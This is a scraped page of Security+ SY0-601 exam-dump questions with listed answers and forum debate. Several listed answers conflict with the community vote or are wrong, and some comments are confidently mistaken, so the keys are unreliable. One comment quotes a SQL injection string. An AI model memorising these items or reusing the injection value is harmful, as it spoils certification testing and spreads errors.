  alayeluwa Highly Voted  3 months, 3 weeks ago


Selected Answer: C
Correcting their mistake lol
upvoted 6 times

  Alizadeh Most Recent  1 month, 1 week ago


Selected Answer: C
C. Corrective controls are being implemented.

Corrective controls are measures that are put in place to fix problems or weaknesses that have been identified. They are typically implemented
after an incident has occurred in order to repair the damage and prevent similar incidents from happening in the future. In this scenario, the
organization is repairing the damage after an incident, which suggests that corrective controls are being implemented.

Detective controls are measures that are put in place to detect when a problem or weakness has occurred. Preventive controls are measures that
are put in place to prevent problems or weaknesses from occurring in the first place. Compensating controls are measures that are put in place to
compensate for weakness or deficiency in another control.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
When an organization is repairing the damage after an incident, they are implementing corrective controls. Corrective controls are measures that
are put in place to fix problems or address vulnerabilities that have already been identified. This is in contrast to preventive controls, which are
measures that are put in place to prevent problems from occurring in the first place, and detective controls, which are measures that are put in
place to detect problems or vulnerabilities before they can cause harm. Compensating controls are additional controls that are put in place to
provide additional protection or to compensate for the shortcomings of other controls. In this case, the organization is taking corrective action to
repair the damage caused by the incident.
upvoted 1 times

  Zaado 3 months, 2 weeks ago


A compensating control, also called an alternative control, is a mechanism that is put in place to satisfy the requirement for a security measure
that is deemed too difficult or impractical to implement at the present time.

So it has to be corrective.
upvoted 2 times

  NXPERT 3 months, 2 weeks ago


D: Compensating, the question didn't say, patched the intrusion, it clearly says "recovering from damage".
upvoted 1 times

  ostralo 3 months, 2 weeks ago


I disagree,
Compensating controls are alternative controls used when a primary control is not feasible.

Corrective controls attempt to reverse the impact of an incident.

https://purplesec.us/security-controls/
upvoted 2 times

  abrilo 3 months, 2 weeks ago


Selected Answer: D
A compensating control attempts to recover from an intrusion by compensating for the issues that were left behind. For example, if someone
Stole a laptop with all of our data, we could compensate for that by purchasing a new laptop and restoring that data from backup.

A corrective control is designed to mitigate any damage that was occurred because of a security event. For example in IPS, intrusion prevention
system can identify an attack on the network and block that traffic from entering the rest of the network.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 448/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times

  Ranaer 2 weeks, 2 days ago


Absolutely incorrect.

Compensating control is an alternative method, which you are using because either there is no other way to prevent that risk, or the baseline
solution is currently unavailable, thus you need something inplace until it becomes available.
Example: The standard in a company to access the Server room is Biometric scanner. However the office in buttfuck nowhere doesnt have
that specific Biometric scanner available and it will take 2 months to get it delivered. You cant leave the server room unsecured, so you put a
padlock on the door. That padlock is a compensating control.
upvoted 2 times

Question #261 Topic 1

A Chief Executive Officer’s (CEO) personal information was stolen in a social-engineering attack. Which of the following sources would reveal if
the CEO’s personal information is for sale?

A. Automated information sharing

B. Open-source intelligence

C. The dark web

D. Vulnerability databases

Correct Answer: C

Community vote distribution


C (100%)

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
Dark Web for sure.
upvoted 1 times

  nobnarb 3 months, 2 weeks ago


Selected Answer: C
The dark web is where you go for the purchase of illegal items, but damn ima bout to fail this exam lol.
upvoted 4 times

  TheGinjaNinja 2 months ago


Hopefully, you didn't :)
or if you haven't taken it yet- You got this!
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 449/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #262 Topic 1

Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?

A. TTP

B. OSINT

C. SOAR

D. SIEM

Correct Answer: C

Community vote distribution


C (100%)

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: C
What is SOAR? SOAR collects data and alerts security teams using a centralized platform similar to SIEM, but SIEM only sends alerts to security
analysts. SOAR security, on the other hand, takes it a step further by automating the responses. It uses artificial intelligence (AI) to learn pattern
behaviors, which enable it to predict similar threats before they happen. This makes it easier for IT security staff to detect and address threats.

https://www.fortinet.com/resources/cyberglossary/what-is-soar
upvoted 11 times

  passmemo 3 months, 3 weeks ago


Agree with C
upvoted 3 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: C
C. SOAR (Security Operations Automation and Response) typically uses a combination of human and artificial intelligence to analyze event data
and take action without intervention. This technology automates manual tasks, such as triage, investigation, and remediation, to improve the
speed and efficiency of incident response. By using machine learning algorithms and a knowledge base, SOAR can learn from previous incidents
and make more informed decisions, freeing up security personnel to focus on higher-level tasks.
upvoted 1 times

  Gr3gg3 2 months, 3 weeks ago


Human and Artificial with no intervention? I think its OSINT
upvoted 1 times

  Gr3gg3 2 months, 3 weeks ago


didnt read the Q properly - take action without intervention = I agree with C
upvoted 2 times

  Skelter117 3 months, 3 weeks ago


but does it mean without human intervention or artificial intelligence intervention?
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 450/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #263 Topic 1

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:

* Must be able to differentiate between users connected to WiFi


* The encryption keys need to change routinely without interrupting the users or forcing reauthentication
* Must be able to integrate with RADIUS
* Must not have any open SSIDs

Which of the following options BEST accommodates these requirements?

A. WPA2-Enterprise

B. WPA3-PSK

C. 802.11n

D. WPS

Correct Answer: A

Community vote distribution


A (100%)

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: A
WPA2-Enterprise
Deploying WPA2-Enterprise requires a RADIUS server, which handles the task of authenticating network users access. The actual authentication
process is based on the 802.1x policy and comes in several different systems labelled EAP. Because each device is authenticated before it
connects, a personal, encrypted tunnel is effectively created between the device and the network.

https://www.securew2.com/solutions/wpa2-enterprise-and-802-1x-simplified
upvoted 11 times

  Fuzm4n Most Recent  3 months, 3 weeks ago


PSK eliminated in WPA3. WPA2-Enterprise makes sense.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 451/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #264 Topic 1

A security administrator is trying to determine whether a server is vulnerable to a range of attacks. After using a tool, the administrator obtains the
following output:

Which of the following attacks was successfully implemented based on the output?

A. Memory leak

B. Race conditions

C. SQL injection

D. Directory traversal

Correct Answer: D

Community vote distribution


D (88%) 13%

  Thapas Highly Voted  3 months, 2 weeks ago


Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files
upvoted 9 times

  FMMIR Most Recent  2 months ago


Selected Answer: D
Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
For this looks like the output of a successfull directory traversal attack. The attacker was able to view the output of the the /etc/passwd file on a
linux server (that would look something like the presented output here).
upvoted 3 times

  comeragh 2 months, 3 weeks ago


Selected Answer: D
D - directory traversal. SQLi is 1=1 or 0=0 for example not 1:1.
upvoted 2 times

  ankit_1606 2 months, 3 weeks ago


J_Ark1, SQL injection is ' OR '1'='1. Source: Wikipedia
upvoted 1 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: C
"1:1" - SQL injection correct me if im wrong
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 452/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #265 Topic 1

A Chief Security Officer is looking for a solution that can reduce the occurrence of customers receiving errors from back-end infrastructure when
systems go offline unexpectedly. The security architect would like the solution to help maintain session persistence. Which of the following would
BEST meet the requirements?

A. Reverse proxy

B. NIC teaming

C. Load balancer

D. Forward proxy

Correct Answer: A

Community vote distribution


C (80%) A (20%)

  Elly98 4 days, 1 hour ago


Why not NIC Teaming?
upvoted 1 times

  Elly98 4 days, 1 hour ago


Network interface card (NIC) teaming is a method of providing high availability and fault tolerance in servers. (Source: Dell)
upvoted 1 times

  amadeosmith 1 week ago


Selected Answer: A
Layer-4 load balancers process requests faster than Layer-7 ones, but they cannot provide session-persistent load balancing. On the other side,
layer-7 load balancers, which are known as reverse-proxies, can direct all requests of an application-level session to the same server, but they
impose a high processing cost due to processing requests at the application level.
upvoted 1 times

  afazaeli 1 month, 4 weeks ago


NIC Teaming is correct
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
Load balancer and Reverse Proxy will both do the job for requirement 1, but load balancer will also provide session persistency
upvoted 2 times

  Tomtom11 3 months ago


Its not C
Load balancing is best for stateless
systems, as subsequent requests can be handled by any server, not just the
one that processed the previous request.
upvoted 1 times

  Sandon 1 week, 2 days ago


It is C
upvoted 2 times

  kennyleung0514 3 months, 1 week ago


Selected Answer: C
Load Balancer can provide below functions:
1. Not to send to the offlined systems with active monitoring.
2. Have persistence settings
upvoted 2 times

  atrax 3 months, 2 weeks ago


Selected Answer: A
Same question as #3
upvoted 1 times

  yasuke 2 months, 3 weeks ago


Q#3 states that session persistence is not important hence reverse proxy.
for this Q session persistence is important hence LB.
upvoted 1 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 453/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  atrax 3 months, 2 weeks ago


my bad is Load Balancer C
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


Selected Answer: C

Agree, load balancer maintains "session persistence"


upvoted 1 times

  jspecht 3 months, 2 weeks ago


Selected Answer: C
A load balancer can monitor the backend servers and direct traffic to working servers when other servers go offline. It can also maintain session
persistence, where a reverse proxy does not care about session persistence.
upvoted 4 times

  Callie_Cassanova 3 months, 2 weeks ago


If you put load balancing wouldn't the answer be NIC teaming since it includes load balancing?
upvoted 2 times

  03allen 3 months, 1 week ago


yes,
Network Interface Card (NIC) teaming is a common technique of grouping physical network adapters to improve performance and
redundancy. The major benefits of NIC teaming are load balancing (redistributing traffic over networks) and failover (ensuring network
continuity in the event of system hardware failure) without the need for multiple physical connections.

Anyone can answer this please?


upvoted 1 times

  RuthS 3 months, 1 week ago


The answer should be B. The key here is "session persistence". Load balancing would direct to the server, but if NIC was down, the
session would end.
By doing NIC teaming, if a NIC go down, there is a redundancy to keep the session persistence.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 454/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #266 Topic 1

Which of the following should an organization consider implementing in the event executives need to speak to the media after a publicized data
breach?

A. Incident response plan

B. Business continuity plan

C. Communication plan

D. Disaster recovery plan

Correct Answer: C

Community vote distribution


C (100%)

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: C
Answer is C.
A communication plan is a policy-driven approach to providing company stakeholders with certain information

I got this through process of elimination.

I take my test this Saturday 10/29/22.


This is the last question in review for me.
See yall on the other side.
upvoted 13 times

  Sandon 2 months, 3 weeks ago


I'm sure you crushed it. Thanks for your helpful comments.
upvoted 1 times

  Freddy_0034 2 months, 3 weeks ago


Will miss you and stoneface.
upvoted 4 times

  Ron9481 Most Recent  3 months ago


Passed today with 794. Seen all the PBQ and a lot of the questions verbatim. And I’m not a bot. I’m saying that because I didn’t believe all the
positive reviews. I seen a couple of reviews that said that they had none of the questions for this dump, but that wasn’t the case for me. I
reviewed all the questions at least 4 times.
upvoted 4 times

  banditring 3 months, 3 weeks ago


where is Communication Plan on the objectives?
upvoted 4 times

  Skelter117 3 months, 3 weeks ago


Section 4.2 look on the right side
upvoted 6 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 455/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #267 Topic 1

A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and
emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the BEST defense against this
scenario?

A. Configuring signature-based antivirus to update every 30 minutes

B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion

C. Implementing application execution in a sandbox for unknown software

D. Fuzzing new files for vulnerabilities if they are not digitally signed

Correct Answer: C

Community vote distribution


C (77%) B (23%)

  no_name_ Highly Voted  2 months, 2 weeks ago


Selected Answer: C
Encryption is the method by which information is converted into secret code that hides the information's true meaning. This does nothing for
protecting a system. Encrypting bad code will just look different and mess up your system anyway.
upvoted 6 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: B
B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion

In the described scenario, the best defense is to enforce S/MIME for email and automatically encrypt USB drives upon insertion. S/MIME
(Secure/Multipurpose Internet Mail Extensions) is a standard for public key encryption and digital signatures for email. This helps to ensure that
the email is encrypted end-to-end, making it more difficult for attackers to intercept and read sensitive information.

Automatically encrypting USB drives upon insertion helps to ensure that the data on the drive is protected in case it is lost or stolen. This way,
even if the attacker is able to copy the malware to the drive, it will be encrypted and unreadable, reducing the risk of a successful attack.
upvoted 1 times

  ArthurCockburn 3 days, 17 hours ago


You're reading the question entirely wrong. The issue isn't that emails/USB sticks with sensitive data are not encrypted and being read by
attackers.

The question statements the delivery system for custom malware is email and USB sticks being left in parking lots (and implies that the users
are plugging them into the target networks, compromising them). Encrypting data doesn't change that the malware has already reached the
target network.

Implementing application execution of unknown software in a sandbox would completely remove the possibility that users unknowingly run a
malicious application they recieved through an email or found on a USB stick.
upvoted 2 times

  Nirmalabhi 2 weeks, 2 days ago


just dont understand how can it be C sandoboxing . it has nothing to do with USB ?
upvoted 1 times

  Ranaer 3 days, 3 hours ago


/The organization is concerned that custom malware is being created and emailed into the company or installed on USB sticks that are
dropped in parking lots. /

There is custom malware on the USB sticks. And you can try to train people as much as you want, they will always be stupid and/or make
mistakes and plug that USB into one of your machines. Your compensating control is that you force any application into a sandbox so they
cant harm your network.
upvoted 1 times

  Sandon 1 week, 2 days ago


It does
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The best defense against the scenario described is implementing application execution in a sandbox for unknown software. A sandbox is a
controlled environment in which an application can be executed and observed without affecting the rest of the system. This allows the
application to be run safely, even if it is unknown or potentially malicious. If the application is found to be malicious, it can be terminated without
damaging the rest of the system. Configuring signature-based antivirus to update every 30 minutes can help protect against known malware, but
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 456/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

it will not protect against custom malware that has not yet been detected. Enforcing S/MIME for email and automatically encrypting USB drives
upon insertion can help protect against unauthorized access to sensitive data, but it will not protect against malware that is installed on a system.
Fuzzing new files for vulnerabilities can help identify potential weaknesses in software, but it will not protect against malware that is already
installed on a system
upvoted 4 times

  viksap 1 month, 2 weeks ago


Are you scheduled to take your exam soon or have you taken it?
upvoted 1 times

  okay123 1 month, 3 weeks ago


Selected Answer: B
It's B because why would we encrypt malware? The goal of encryption is to protect data by preventing it from being accessed by unauthorized
users.

Sandboxing is used to isolate software suspected to be malicious. So it's B


upvoted 1 times

  Sandon 1 week, 2 days ago


Encrypting malware does not stop it
upvoted 1 times

  BluEric 2 months, 3 weeks ago


Selected Answer: C
Going with C . Encrypting malware will not protect the system, it'll just protect the malware itself. A sandbox environment will ensure malware
does not get into the real system.
upvoted 4 times

  carpathia 2 months, 3 weeks ago


Selected Answer: C
Unless I haven't heard of this method, how s/MIME and encrypting usb sticks protects agaianst malware? If it's custom malware, antivirus won;t
help. Most probably C, sandbox, but then I am not sure how a sandbox, even though I am nots sure how it works, is this a software on every
machine that can be installed and triggeres the snadbox automatically, is it a separate isolated system? Someone with knowledge would be of
great help. If it's a separate sysytem it doesn't nake any sense in this question as an answer.
upvoted 3 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: C
On what planet does encrypting an enemy flash drive do anything for your company's security?
upvoted 4 times

  03allen 2 months, 3 weeks ago


Selected Answer: B
This is a new question
upvoted 2 times

  Imanism 2 months, 3 weeks ago


Selected Answer: C
Because it mentions custom malware the only way to secure is sandbox
upvoted 3 times

  comeragh 2 months, 3 weeks ago


Selected Answer: B
B seems to make most sense here given the question
upvoted 1 times

  ankit_1606 2 months, 3 weeks ago


Answer is B. Question it self has Answer. USB=USB and Email=S/MIME
upvoted 1 times

  kausalya2022 2 months, 3 weeks ago


Will encrypting malware will protect against it?
upvoted 1 times

  kstevens11 2 months, 3 weeks ago


Selected Answer: B
I would think B is a better defense, as it mentions two more preventive measures. C doesn't account for all options (something other than an
application). I also would go with user training if it were given as an option here.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 457/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #268 Topic 1

A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services. Which of the following would
BEST allow the company to meet this requirement?

A. IaaS

B. PaaS

C. MaaS

D. SaaS

Correct Answer: B

Community vote distribution


D (100%)

  BluEric 2 months, 3 weeks ago


Selected Answer: D
Going with D- SaaS. It is not stating what type of devices, just BYOD, so cannot tell which platform is needed, or what requirements are involved.
SaaS is the one that fits the most, IMHO.
upvoted 2 times

  blacktaliban 2 months, 3 weeks ago


Selected Answer: D
going with D
upvoted 1 times

  bengy78 2 months, 3 weeks ago


Is has to be SaaS. Phones dont need access to server and network hardware (IaaS) or application development server (PaaS) or Monitoring
(MaaS
upvoted 2 times

  imageee 2 months, 3 weeks ago


Selected Answer: D
Must be D?
upvoted 3 times

  Sandon 2 months, 3 weeks ago


Agreed
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 458/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #269 Topic 1

During a recent security incident at a multinational corporation a security analyst found the following logs for an account called user:

Which of the following account policies would BEST prevent attackers from logging in as user?

A. Impossible travel time

B. Geofencing

C. Time-based logins

D. Geolocation

Correct Answer: A

Community vote distribution


A (100%)

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Impossible travel time

Impossible Travel is a calculation made by comparing a user's last known location to their current location, then assessing whether the trip is
likely or even possible in the time that elapsed between the two measurements.

It can calculate the time it would take to travel from New York to Los Angeles and see it would be impossible to accomplish this within a minute.
upvoted 4 times

  imageee 2 months, 3 weeks ago


Selected Answer: A
Answer A
upvoted 1 times

  03allen 2 months, 3 weeks ago


Selected Answer: A
Seems like the website is giving the right answers now.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 459/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #270 Topic 1

An organization is tuning SIEM rules based off of threat intelligence reports. Which of the following phases of the incident response process does
this scenario represent?

A. Lessons learned

B. Eradication

C. Recovery

D. Preparation

Correct Answer: D

Community vote distribution


D (100%)

  GetBuckets 1 month, 3 weeks ago


That’s D. Why? The organization learned about new threats/vulnerabilities from these threat intelligence reports that made them tune (tweak) their
SIEM rules.
upvoted 1 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: D
They simply received intelligence reports. They are adjusting their defenses in PREPARATION for an attack. Now if this was after an attack then in
would fall into the correction category.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Preparation

The preparation phase is when the organization is preparing for the attack. Tuning the SIEM is just providing the latest threat information to the
system for preparation.

=======================
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.
upvoted 2 times

  kindis 2 months, 3 weeks ago


Lessons learned A for me.
upvoted 1 times

  comeragh 2 months, 3 weeks ago


Selected Answer: D
Agree with D here
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 460/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #271 Topic 1

The database administration team is requesting guidance for a secure solution that will ensure confidentiality of cardholder data at rest only in
certain fields in the database schema. The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered useless if a
data breach occurs. Which of the following is the BEST solution to meet the requirement?

A. Tokenization

B. Masking

C. Full disk encryption

D. Mirroring

Correct Answer: A

Community vote distribution


A (100%)

  Imanism Highly Voted  2 months, 3 weeks ago


Selected Answer: A
tokenization is mainly used to protect data at rest whereas masking is used to protect data in use.
upvoted 7 times

  JSOG Most Recent  2 months ago


Selected Answer: A
A for me
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: A
"While both tokenization and masking are great techniques used to protect sensitive data, tokenization is mainly used to protect data at rest
whereas masking is used to protect data in use."

http://www.differencebetween.net/technology/difference-between-tokenization-and-masking/#ixzz7kbfKgsdk
upvoted 3 times

  comeragh 2 months, 3 weeks ago


Selected Answer: A
Agree with A being correct answer here
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 461/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #272 Topic 1

A company’s security team received notice of a critical vulnerability affecting a high-profile device within the web infrastructure. The vendor patch
was just made available online but has not yet been regression tested in development environments. In the interim, firewall rules were
implemented to reduce the access to the interface affected by the vulnerability. Which of the following controls does this scenario describe?

A. Deterrent

B. Compensating

C. Detective

D. Preventive

Correct Answer: B

Community vote distribution


B (100%)

  Imanism Highly Voted  2 months, 3 weeks ago


Selected Answer: B
compensating control, also called an alternative control
upvoted 7 times

  comeragh Most Recent  2 months, 3 weeks ago


Selected Answer: B
Compensating control looks to be correct here. Open to correction however
A compensating control, also called an alternative control, is a mechanism that is put in place to satisfy the requirement for a security measure
that is deemed too difficult or impractical to implement at the present time.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 462/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #273 Topic 1

A security analyst is reviewing the following command-line output:

Which of the following is the analyst observing?

A. ICMP spoofing

B. URL redirection

C. MAC address cloning

D. DNS poisoning

Correct Answer: C

Community vote distribution


C (100%)

  Freddy_0034 2 months, 3 weeks ago


C. MAC address Cloning
upvoted 1 times

  Imanism 2 months, 3 weeks ago


Selected Answer: C
C for obvious reason
upvoted 3 times

  comeragh 2 months, 3 weeks ago


Selected Answer: C
Agree with C here - MAC address cloning
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 463/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #274 Topic 1

A company was recently breached, Part of the company’s new cybersecurity strategy is to centralize the logs from all security devices. Which of
the following components forwards the logs to a central source?

A. Log enrichment

B. Log aggregation

C. Log parser

D. Log collector

Correct Answer: D

Community vote distribution


D (86%) 14%

  Knowledge33 Highly Voted  2 months, 3 weeks ago


Selected Answer: D
Log collectors are pieces of software that function to gather data from multiple independent sources and feed it into a unified source such as a
SIEM.

Log aggregation is the process of combining logs together. This is done to allow different formats from different systems to work together.
upvoted 6 times

  mike47 Most Recent  3 days, 23 hours ago


Selected Answer: D
Log Collector is the answer as it collects data from "many different Sources" and brings tall of it to one single place.
upvoted 1 times

  carpathia 2 months, 1 week ago


Selected Answer: D
pg 123 Conklin's book, Log Collectors.
upvoted 1 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: B
Log aggregation is the mechanism for capturing, normalizing, and consolidating logs from different sources to a centralized platform for
correlating and analyzing the data.
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Log collector

Log collectors are pieces of software that function by gathering data from multiple independent sources and feed it into a unified source such as
a SIEM. Log collectors will collect the logs and then the SIEM solution will store the logs.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 464/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #275 Topic 1

Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC system?

A. To avoid data leakage

B. To protect surveillance logs

C. To ensure availability

D. To facilitate third-party access

Correct Answer: A

Community vote distribution


C (50%) A (50%)

  Sir_Learnalot Highly Voted  2 months, 3 weeks ago


Selected Answer: C
Must be C for me. A HVAC System is a important and critical component of a Datacenter. If this fails, the systems could overheat and therefor
crash which ends in loss of availability and in the worst case also data loss.
upvoted 10 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: A
A. To avoid data leakage. An air-gapped laboratory HVAC system is often used in environments where sensitive information is being handled,
such as research and development or government facilities. Securing the HVAC system helps prevent data leakage by physically separating the
system from any external networks and limiting the number of people who have access to the system. This helps reduce the risk of unauthorized
access and data breaches that could result from network infiltration or cyber attacks.
upvoted 2 times

  T4IT 1 week, 1 day ago


Selected Answer: C
No AC no PC. C is the right answer.
upvoted 1 times

  Sanjucbsa 1 month ago


Selected Answer: A
The option C for availability cannot be the answer as the air gap network is never connected to the outside network and so its availability is not
necessary.
upvoted 2 times

  Ranaer 1 month, 1 week ago


Selected Answer: A
To everyone saying C, I believe you are wrong. Air gap concerns only network/data connection. Power isnt part of the air gap. Both the servers
and HVAC use the same power, even when the HVAC is air gapped.
A is clearly the only reasonable answer.
upvoted 3 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: A
Answer is A
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The most likely reason for securing an air-gapped laboratory HVAC system is to avoid data leakage. An air-gapped system is one that is
physically isolated from other networks, which makes it more difficult for an attacker to access data on the system. By securing the HVAC
system, you can help prevent data leakage by ensuring that the air within the laboratory is not contaminated with malicious particles that could
be used to infiltrate the system.
upvoted 3 times

  robbrown2 1 week, 1 day ago


This is my vote for best answer yet!! COVID got everyone thinking malicious particles. You can just wear you mask in the datacenter!! LOL!
upvoted 1 times

  Sandon 1 month, 2 weeks ago


Are you serious? Malicious particles?? lol
upvoted 6 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 465/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  nicekoda 2 months ago


HVACKer attacks are only useful for relaying commands into an air-gapped network, but not for stealing data.
upvoted 1 times

  Blueteam 2 months, 1 week ago


Another bad question. However I think A is the right answer.
HVAC network can be used for brining the HVAC system down.
However HVAC connected network also can be used for accessing data. A good example is stealing CC information back in 2014 from target.
https://krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company/

I think the answer here depends on "laboratory"! what kind of laboratory is this?
usually the data and not operation is important function of labs.
In above example target attackers did not hack the HVAC system to bring it down they used it to access CC information.
upvoted 2 times

  minimoose 2 months, 1 week ago


The HVAC system is air-gapped so there is no threat of leaking data. I think the answer is still C.
upvoted 2 times

  Reese20_14 2 months, 2 weeks ago


Selected Answer: C
Almost picked A on this one but was saved by an Article from Bleepingcomputer.com regarding HVACKer attacks:

"HVACKer attacks are only useful for relaying commands into an air-gapped network, but not for stealing data. While malware can control a
computer’s heat emissions, *HVAC units are not equipped with enough accurate temperature sensors to pick up data* from a computer’s almost
indiscernible heat emissions."

So we most likely wouldn't be concerned with Data Leakage via an HVAC system.
upvoted 1 times

  ych243666 2 months, 2 weeks ago


I think the air-gapped here means https://en.wikipedia.org/wiki/Air_gap_(networking), so the anwser is A.
upvoted 3 times

  kindis 2 months, 2 weeks ago


An air gap, air wall, air gapping or disconnected network is a network security measure employed on one or more computers to ensure that a
secure computer network is physically isolated from unsecured networks, such as the public Internet or an unsecured local area
Its A for me
upvoted 3 times

  BluEric 2 months, 3 weeks ago


Selected Answer: A
I like A for this one, but I am not sure. The reason I am picking this, is that the keyword here is secure, and to me that ties directly to avoiding a
leakage/security issue
upvoted 1 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: C
Sure I guess C, but also if HVAC isn't secured they can use it to traverse through the network. But it does say MOST likely.
upvoted 1 times

  Imanism 2 months, 3 weeks ago


Selected Answer: A
Just a little research. Not completely sure but I go with A
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 466/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #276 Topic 1

A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL was discovered. Which of the following should be
done FIRST to prevent other users from accessing the malicious URL?

A. Configure the web content filter for the web address.

B. Report the website to threat intelligence partners.

C. Set the SIEM to alert for any activity to the web address.

D. Send out a corporate communication to warn all users of the malicious email.

Correct Answer: A

Community vote distribution


A (100%)

  nobnarb 2 months, 3 weeks ago


Selected Answer: A
Definitely what you should do first.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Configure the web content filter for the web address.

Web content filtering is the practice of blocking access to web content that may be deemed offensive, inappropriate, or even dangerous. Better
to just block out the URL since we already know its malicious now and notify later since you don't know how many other people received the
email.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: A
"A" would be a preventiv option. After that I´d go with "D" than "C" and last would be "B" but for the Question..."A"
upvoted 1 times

  kstevens11 2 months, 3 weeks ago


Selected Answer: A
only option that is preventative
upvoted 3 times

  03allen 2 months, 3 weeks ago


I think D is also a common way to prevent a spread?
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 467/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #277 Topic 1

A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in
this documentation? (Choose two.)

A. The order of volatility

B. A CRC32 checksum

C. The provenance of the artifacts

D. The vendor’s name

E. The date and time

F. A warning banner

Correct Answer: AE

Community vote distribution


CE (76%) 12% 12%

  ronniehaang 3 days, 22 hours ago


Selected Answer: CE
A systems analyst should include the following information in the new digital forensics chain-of-custody form:

E. The date and time


